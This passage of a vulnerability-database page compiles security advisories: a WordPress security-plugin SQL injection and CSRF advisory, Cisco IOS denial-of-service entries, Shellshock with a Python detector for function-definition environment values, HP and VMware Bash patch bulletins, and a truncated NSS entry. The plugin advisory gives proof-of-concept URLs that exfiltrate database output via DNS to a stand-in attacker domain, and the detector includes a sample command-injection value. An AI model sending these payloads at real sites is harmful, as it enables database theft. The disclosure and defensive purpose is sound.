The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator into visiting a web page with a CSRF exploit, e.g.:
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameter to the "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks.
[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References
| VAR-201409-0404 | CVE-2014-3354 |
Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201204-0003, VAR-E-201204-0002, VAR-E-201204-0001 |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS 12.0, 12.2, 12.4, 15.0, 15.1, 15.2, and 15.3 and IOS XE 2.x and 3.x before 3.7.4S; 3.2.xSE and 3.3.xSE before 3.3.2SE; 3.3.xSG and 3.4.xSG before 3.4.4SG; and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allow remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCui11547. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
These issues are being tracked by Cisco Bug ID CSCui11547. The following products and versions are affected: Cisco IOS Release 12.0, Release 12.2, Release 12.4, Release 15.0, Release 15.1, Release 15.2, and Release 15.3; IOS XE 2.x and 3.x prior to 3.7.4S; 3.2.xSE and 3.3.xSE prior to 3.3.2SE; 3.3.xSG and 3.4.xSG prior to 3.4.4SG; and 3.8.xS, 3.9.xS, and 3.10.xS prior to 3.10.1S.
| VAR-201409-0405 | CVE-2014-3355 | Cisco IOS and IOS XE Service disruption in the metadata flow function (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The metadata flow feature in Cisco IOS 15.1 through 15.3 and IOS XE 3.3.xXO before 3.3.1XO, 3.6.xS and 3.7.xS before 3.7.6S, and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allows remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCug75942. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCug75942. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.3; IOS XE 3.3.xXO prior to 3.3.1XO; 3.6.xS and 3.7.xS prior to 3.7.6S; and 3.8.xS, 3.9.xS, and 3.10.xS prior to 3.10.1S.
| VAR-201409-0406 | CVE-2014-3356 | Cisco IOS and IOS XE Service disruption in the metadata flow function (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The metadata flow feature in Cisco IOS 15.1 through 15.3 and IOS XE 3.3.xXO before 3.3.1XO, 3.6.xS and 3.7.xS before 3.7.6S, and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allows remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCue22753. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCue22753. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.3; IOS XE 3.3.xXO prior to 3.3.1XO; 3.6.xS and 3.7.xS prior to 3.7.6S; and 3.8.xS, 3.9.xS, and 3.10.xS prior to 3.10.1S.
| VAR-201409-0407 | CVE-2014-3357 | Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS 15.0, 15.1, 15.2, and 15.4 and IOS XE 3.3.xSE before 3.3.2SE, 3.3.xXO before 3.3.1XO, 3.5.xE before 3.5.2E, and 3.11.xS before 3.11.1S allow remote attackers to cause a denial of service (device reload) via malformed mDNS packets, aka Bug ID CSCul90866. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCul90866. The following products and versions are affected: Cisco IOS Releases 15.0, 15.1, 15.2, and 15.4, IOS XE 3.3.xSE prior to 3.3.2SE, 3.3.xXO prior to 3.3.1XO, 3.5.xE prior to 3.5.2E and Version 3.11.0S
| VAR-201409-0408 | CVE-2014-3358 | Cisco IOS and IOS XE Software Multicast DNS Gateway Memory Leak Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in Cisco IOS 15.0, 15.1, 15.2, and 15.4 and IOS XE 3.3.xSE before 3.3.2SE, 3.3.xXO before 3.3.1XO, 3.5.xE before 3.5.2E, and 3.11.xS before 3.11.1S allows remote attackers to cause a denial of service (memory consumption, and interface queue wedge or device reload) via malformed mDNS packets, aka Bug ID CSCuj58950. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Cisco IOS and IOS XE software are prone to a remote denial-of-service vulnerability.
This issue is being tracked by Cisco Bug ID CSCuj58950. The following products and versions are affected: Cisco IOS Releases 15.0, 15.1, 15.2, and 15.4, IOS XE 3.3.xSE prior to 3.3.2SE, 3.3.xXO prior to 3.3.1XO, 3.5.xE prior to 3.5.2E and Version 3.11.0S
| VAR-201409-0409 | CVE-2014-3359 | Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Memory leak in Cisco IOS 15.1 through 15.4 and IOS XE 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS before 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S; and 3.11.xS before 3.12S allows remote attackers to cause a denial of service (memory consumption or device reload) via malformed DHCPv6 packets, aka Bug ID CSCum90081. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCum90081. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.4; IOS XE 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS prior to 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS prior to 3.10.1S; and 3.11.xS prior to 3.12S.
| VAR-201409-0390 | CVE-2014-3360 | Cisco IOS and IOS XE Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS 12.4 and 15.0 through 15.4 and IOS XE 3.1.xS, 3.2.xS, 3.3.xS, 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS before 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S; and 3.11.xS before 3.12S allow remote attackers to cause a denial of service (device reload) via a crafted SIP message, aka Bug ID CSCul46586. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches.
This issue is being tracked by Cisco Bug ID CSCul46586. The following products and versions are affected: Cisco IOS Release 15.0 through 15.4; IOS XE 3.1.xS, 3.2.xS, 3.3.xS, 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS prior to 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS prior to 3.10.1S; and 3.11.xS prior to 3.12S.
| VAR-201409-0391 | CVE-2014-3361 | Cisco IOS of ALG Service disruption in modules (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The ALG module in Cisco IOS 15.0 through 15.4 does not properly implement SIP over NAT, which allows remote attackers to cause a denial of service (device reload) via multipart SDP IPv4 traffic, aka Bug ID CSCun54071. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Cisco IOS Software is prone to a denial-of-service vulnerability.
This issue is being tracked by Cisco Bug ID CSCun54071. The vulnerability stems from the fact that the program does not properly handle the translation of IPv4 packets
| VAR-201409-1256 | No CVE | Cross-site request forgery vulnerability for multiple Huawei products |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
FusionManager is management software for hardware devices, virtualization resources, and applications provided by Huawei. Huawei USG is a series of firewall devices. A cross-site request forgery vulnerability exists in FusionManager and the Huawei USG series. A remote attacker can construct malicious URIs, entice a user to open them, and perform malicious operations in the context of the targeted user. Multiple Huawei products are prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks
| VAR-201409-1156 | CVE-2014-6271 |
GNU Bash shell executes commands in exported functions in environment variables
Related entries in the VARIoT exploits database: VAR-E-201409-0013, VAR-E-201409-0022, VAR-E-201409-0010, VAR-E-201409-0017, VAR-E-201409-0018, VAR-E-201409-0020, VAR-E-201409-0021, VAR-E-201410-0028, VAR-E-201410-0031, VAR-E-201410-0026, VAR-E-201410-0021, VAR-E-201410-0023, VAR-E-201409-0019, VAR-E-201410-0030, VAR-E-201410-0027, VAR-E-201410-0024, VAR-E-201410-0022, VAR-E-201409-0011, VAR-E-201409-0015, VAR-E-201410-0029, VAR-E-201409-0561, VAR-E-201409-0560, VAR-E-201409-0562, VAR-E-201409-0565, VAR-E-201409-0544, VAR-E-201409-0543, VAR-E-201409-0548, VAR-E-201409-0563, VAR-E-201409-0566, VAR-E-201409-0564, VAR-E-201409-0559, VAR-E-201409-0555, VAR-E-201409-0546, VAR-E-201409-0549, VAR-E-201409-0545, VAR-E-201409-0553, VAR-E-201409-0550, VAR-E-201409-0552, VAR-E-201409-0558, VAR-E-201409-0547 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. QTS, provided by QNAP Systems, Inc., is the OS for Turbo NAS. QTS contains an OS command injection vulnerability (CWE-78) caused by the GNU Bash vulnerability (JVNVU#97219505). This vulnerability information was reported to IPA under the Information Security Early Warning Partnership, and JPCERT/CC coordinated with the developer. Reporter: Mr. Wakisaka Yuki, University of Electro-Communications. Arbitrary OS commands may be executed with the privileges of the application.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
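The condition described above (a function definition in an environment value, followed by a trailing string) can be checked at the privilege boundary before any Bash child is started. The following is an added example, not code from VARIoT or from any vendor advisory on this page; the variable names and sample values are constructed, and the brace matching is a triage heuristic rather than a shell parser.

```python
"""Flag environment values shaped like Bash exported-function definitions."""
import re

# Bash through 4.3 imports a value that begins with "() {" as a function
# definition. Text left after the body's closing brace is the "trailing
# string" that CVE-2014-6271 describes. The pattern tolerates extra spaces.
FUNC_PREFIX = re.compile(r"^\(\)\s*\{")


def _body_end(value):
    """Index just past the brace that closes the function body, or None if
    the braces never balance. Quoting is deliberately ignored."""
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return i + 1
    return None


def classify(value):
    """Return 'clean', 'function-definition', 'function-with-trailer'
    or 'malformed-function' for one environment value."""
    if not FUNC_PREFIX.match(value):
        return "clean"
    end = _body_end(value)
    if end is None:
        return "malformed-function"
    trailer = value[end:].strip().strip(";").strip()
    return "function-with-trailer" if trailer else "function-definition"


def scrub_environment(env):
    """Return (safe_env, findings). Any value that looks like a function
    definition is dropped from safe_env so it never reaches a Bash child;
    findings lists (name, verdict) pairs for logging or alerting."""
    safe, findings = {}, []
    for name, value in env.items():
        verdict = classify(value)
        if verdict == "clean":
            safe[name] = value
        else:
            findings.append((name, verdict))
    return safe, findings


# Constructed CGI-style environment (mod_cgi is one of the vectors named in
# the description). None of these values comes from a real request.
SAMPLE_ENV = {
    "REQUEST_METHOD": "GET",
    "HTTP_USER_AGENT": "Mozilla/5.0 (X11; Linux x86_64)",
    "HTTP_COOKIE": "() { :; }; echo probe-marker",
    "HTTP_REFERER": "() { return 0; }",
    "HTTP_ACCEPT": "text/html, note (see) {braces} here",
    "HTTP_X_TEST": "() { echo unterminated",
}

if __name__ == "__main__":
    safe_env, hits = scrub_environment(SAMPLE_ENV)
    for var, verdict in hits:
        print(f"dropped {var}: {verdict}")
    print("passed through:", sorted(safe_env))
```

Filtering at the boundary is a stopgap for services that hand attacker-influenced values to Bash; the remediation is a patched Bash.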
Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04558068
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04558068
Version: 1
HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server
Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2015-02-02
Last Updated: 2015-02-02
Potential Security Impact: Multiple vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Insight
Control for Linux Central Management Server Pre-boot Execution Environment
that could be exploited remotely resulting in Denial of Service (DoS),
disclosure of information, and other vulnerabilities.
References:
CVE-2014-6271
CVE-2014-6277
CVE-2014-6278
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187
CVE-2014-7196
SSRT101742
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Insight Control for Linux Central Management Server Pre-boot Execution
Environment running Bash Shell
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference        Base Vector                     Base Score
CVE-2014-6271    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-6277    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-6278    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7169    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7186    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7187    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2014-7196    (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following instructions to resolve these vulnerabilities.
Follow these steps to update the HP Insight Control for Linux Central
Management Server Pre-boot Execution Environment:
NOTE: The following procedure updates the bash shell on the Linux Pre-boot
Execution Environment. Please update the Bash shell version on the HP Insight
Control for Linux Central Management Server also.
1. On the Production RHEL 6.2 OS:
a. Prepare temporary directory for Bash update software:
# mkdir -p $HOME/tmp/bash
# cd $HOME/tmp/bash
# pwd
<home directory>/tmp/bash
b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for
Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html
to the temporary directory '$HOME/tmp/bash'.
c. Extract the Bash update software package.
# rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm | cpio -idmv
d. Verify the version of the Bash update software:
# ./bin/bash --version
GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)
e. Verify version dependencies:
# ldd ./bin/bash
linux-gate.so.1 => (0x008a7000)
libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000)
libdl.so.2 => /lib/libdl.so.2 (0x002c0000)
libc.so.6 => /lib/libc.so.6 (0x0012e000)
/lib/ld-linux.so.2 (0x00108000)
f. Create archive file from '/lib' to copy and install on the Insight Control
for Linux Central Management Server Pre-boot Execution Environment system:
# mkdir $HOME/tmp/lib
# cd /lib
# cp * $HOME/tmp/lib
# cd $HOME/tmp
# pwd
<home directory>/tmp
# tar cvf bash_lib.tar *
2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production
RHEL 6.2 OS system to the Insight Control for Linux Central Management Server
Pre-boot Execution Environment system.
3. On the HP Insight Control for Linux Central Management Server Pre-boot
Execution Environment system:
a. Create a temporary folder for the toolkit and copy the toolkit there:
# mkdir -p $HOME/tmp/temp-toolkit
# cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz $HOME/tmp/temp-toolkit
b. Extract the file 'toolkit.tar.gz' into the temporary folder:
# cd $HOME/tmp/temp-toolkit
# tar zxvf toolkit.tar.gz
# mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp
c. Verify the version of the toolkit Bash:
# $HOME/tmp/temp-toolkit/bin/bash --version
GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005
Free Software Foundation, Inc.
d. Verify dependencies versions:
# ldd $HOME/tmp/temp-toolkit/bin/bash
linux-gate.so.1 => (0xffffe000)
libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000)
libdl.so.2 => /lib/libdl.so.2 (0x008bf000)
libc.so.6 => /lib/libc.so.6 (0x00777000)
/lib/ld-linux.so.2 (0x00755000)
e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib'.
Then copy the bash binary and the library files to their respective
locations:
# tar xvf $HOME/tmp/bash_lib
# cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin
# cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib
f. Create the updated toolkit gzipped archive file and place in
/usr/share/systemimager/boot/i386/standard
# tar czvf toolkit.tar.gz *
# cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard
HISTORY
Version:1 (rev.1) - 2 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
This vulnerability allows users that have been granted access to a shell
script to escalate privilege and execute unrestricted commands at the same
security level as the Bash script. The shell is not accessible via the standard
calibration or remote management interfaces.
NOTE: Only the Z27x model is vulnerable. The unit provides Calibration Software
running on embedded Linux, which includes a Bash Shell. The software is used
for service purposes only.
This bulletin will be revised when the firmware update is released. vulnerability.
HP GNV Website:
http://h71000.www7.hp.com/opensource/gnv.html
Sourceforge:
IA64: https://sourceforge.net/projects/gnv/files/GNV%20-%20I64/V3.0-1/
Alpha: https://sourceforge.net/projects/gnv/files/GNV%20-%20Alpha/V3.0-1/
HP Bash Version for OpenVMS
Platform                                 Patch Kit Name
v1.14-8                       Alpha OpenVMS V8.3, V8.4                 HP-AXPVMS-GNV-BASH-V0114-08.ZIP
v1.14-8                       ITANIUM OpenVMS V8.3, V8.3-1H1, V8.4     HP-AXPVMS-GNV-BASH-V0114-08.ZIP
HISTORY
Version:1 (rev.1) - 12 January 2015 Initial release
Support: For further information, contact normal HP Services support channel.
"HP is broadly distributing this Security Bulletin in order to bring to the
attention of users of the affected HP products the important security
information contained in this Bulletin. HP recommends that all users
determine the applicability of this information to their individual
situations and take appropriate action. HP does not warrant that this
information is necessarily accurate or complete for all user situations and,
consequently, HP will not be responsible for any damages resulting from
user's use or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose, title and non-infringement."
Copyright 2015 Hewlett-Packard Development Company, L.P.
Summary
VMware product updates address Bash security vulnerabilities.
Relevant Releases (Affected products for which remediation is present)
vCenter Log Insight 2.0
3. Problem Description
a.
Bash libraries have been updated in multiple products to resolve
multiple critical security issues, also referred to as Shellshock.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the identifiers CVE-2014-6271, CVE-2014-7169,
CVE-2014-7186, and CVE-2014-7187 to these issues.
VMware products have been grouped into the following four
product categories:
I) ESXi and ESX Hypervisor
ESXi is not affected because ESXi uses the Ash shell (through
busybox), which is not affected by the vulnerability reported
for the Bash shell. See table 1 for
remediation for ESX.
II) Windows-based products
Windows-based products, including all versions of vCenter Server
running on Windows, are not affected.
III) VMware (virtual) appliances
VMware (virtual) appliances ship with an affected version of Bash.
See table 2 for remediation for appliances.
IV) Products that run on Linux, Android, OSX or iOS (excluding
virtual appliances)
Products that run on Linux, Android, OSX or iOS (excluding
virtual appliances) might use the Bash shell that is part of the
operating system. If the operating system has a vulnerable
version of Bash, the Bash security vulnerability might be
exploited through the product. VMware recommends that customers
contact their operating system vendor for a patch.
MITIGATIONS
VMware encourages restricting access to appliances through
firewall rules and other network layer controls to only trusted IP
addresses. This measure will greatly reduce any risk to these
appliances.
RECOMMENDATIONS
VMware recommends customers evaluate and deploy patches for
affected products in Table 1 and 2 below as these
patches become available.
Column 4 of the following tables lists the action required to
remediate the vulnerability in each release, if a solution is
available.
Table 1 - ESXi and ESX Hypervisor
=================================
VMware            Product    Running    Replace with/
Product           Version    on         Apply Patch
==============    =======    =======    =============
ESXi              any        ESXi       Not affected
ESX               4.1        ESX        Patch pending *
ESX               4.0        ESX        Patch pending *
* VMware will make VMware ESX 4.0 and 4.1 security patches available
for the Bash shell vulnerability. This security patch release is an
exception to the existing VMware lifecycle policy.
Table 2 - Products that are shipped as a (virtual) appliance.
=============================================================
VMware                              Product       Running    Replace with/
Product                             Version       on         Apply Patch
================================    ==========    =======    =============
vCenter Server Appliance            5.x           Linux      Patch Pending
Horizon DaaS Platform               6.x           Linux      Patch Pending
Horizon Workspace                   1.x, 2.x      Linux      Patch Pending
IT Business Management Suite        1.x           Linux      Patch Pending
NSX for Multi-Hypervisor            4.x           Linux      Patch Pending
NSX for vSphere                     6.x           Linux      Patch Pending
NVP                                 3.x           Linux      Patch Pending
vCenter Converter Standalone        5.x           Linux      Patch Pending
vCenter Hyperic Server              5.x           Linux      Patch Pending
vCenter Infrastructure Navigator    5.x           Linux      Patch Pending
vCenter Log Insight                 1.x, 2.x      Linux      2.0 U1
vCenter Operations Manager          5.x           Linux      Patch Pending
vCenter Orchestrator Appliance      4.x, 5.x      Linux      Patch Pending
vCenter Site Recovery Manager       5.x           Linux      Patch Pending **
vCenter Support Assistant           5.x           Linux      Patch Pending
vCloud Automation Center            6.x           Linux      Patch Pending
vCloud Automation Center
Application Services                6.x           Linux      Patch Pending
vCloud Director Appliance           5.x           Linux      Patch Pending
vCloud Connector                    2.x           Linux      Patch Pending
vCloud Networking and Security      5.x           Linux      Patch Pending
vCloud Usage Meter                  3.x           Linux      Patch Pending
vFabric Application Director        5.x, 6.x      Linux      Patch Pending
vFabric Postgres                    9.x           Linux      Patch Pending
Viewplanner                         3.x           Linux      Patch Pending
VMware Application Dependency
Planner                             x.x           Linux      Patch Pending
VMware Data Recovery                2.x           Linux      Patch Pending
VMware HealthAnalyzer               5.x           Linux      Patch Pending
VMware Mirage Gateway               5.x           Linux      Patch Pending
VMware Socialcast On Premise        x.x           Linux      Patch Pending
VMware Studio                       2.x           Linux      Patch Pending
VMware TAM Data Manager             x.x           Linux      Patch Pending
VMware Workbench                    3.x           Linux      Patch Pending
vSphere App HA                      1.x           Linux      Patch Pending
vSphere Big Data Extensions         1.x, 2.x      Linux      Patch Pending
vSphere Data Protection             5.x           Linux      Patch Pending
vSphere Management Assistant        5.x           Linux      Patch Pending
vSphere Replication                 5.x           Linux      Patch Pending
vSphere Storage Appliance           5.x           Linux      Patch Pending
** This product includes Virtual Appliances that will be updated, the
product itself is not a Virtual Appliance.
Solution
vCenter Log Insight
----------------------------
Downloads:
https://www.vmware.com/go/download-vcenter-log-insight
(click Go to Downloads)
Documentation:
http://kb.vmware.com/kb/2091065
5. References
VMware Knowledge Base Article 2090740
http://kb.vmware.com/kb/2090740
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187
------------------------------------------------------------------------
6. Change Log
2014-09-30 VMSA-2014-0010
Initial security advisory in conjunction with the release of
vCenter Log Insight 2.0 U1 on 2014-09-30.
Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
security-announce at lists.vmware.com
bugtraq at securityfocus.com
fulldisclosure at seclists.org
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware Security Response Policy
https://www.vmware.com/support/policies/security_response.html
VMware Lifecycle Policy
https://www.vmware.com/support/policies/lifecycle.html
Twitter
https://twitter.com/VMwareSRC
Copyright 2014 VMware Inc. All rights reserved
| VAR-201409-0340 | CVE-2014-1568 | Mozilla Network Security Services (NSS) fails to properly verify RSA signatures |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Mozilla Network Security Services (NSS) before 3.16.2.1, 3.16.x before 3.16.5, and 3.17.x before 3.17.1, as used in Mozilla Firefox before 32.0.3, Mozilla Firefox ESR 24.x before 24.8.1 and 31.x before 31.1.1, Mozilla Thunderbird before 24.8.1 and 31.x before 31.1.2, Mozilla SeaMonkey before 2.29.1, Google Chrome before 37.0.2062.124 on Windows and OS X, and Google Chrome OS before 37.0.2062.120, does not properly parse ASN.1 values in X.509 certificates, which makes it easier for remote attackers to spoof RSA signatures via a crafted certificate, aka a "signature malleability" issue. This vulnerability may allow an attacker to forge an RSA signature, such as one on an SSL certificate. The Mozilla Network Security Services (NSS) library has a flaw in its DigestInfo processing and does not properly verify RSA signatures. When a BER-encoded DigestInfo field is parsed, the parsing of padding bytes is bypassed, so a forged PKCS#1 v1.5 RSA signature may not be detected (CWE-295: Improper Certificate Validation, http://cwe.mitre.org/data/definitions/295.html). This 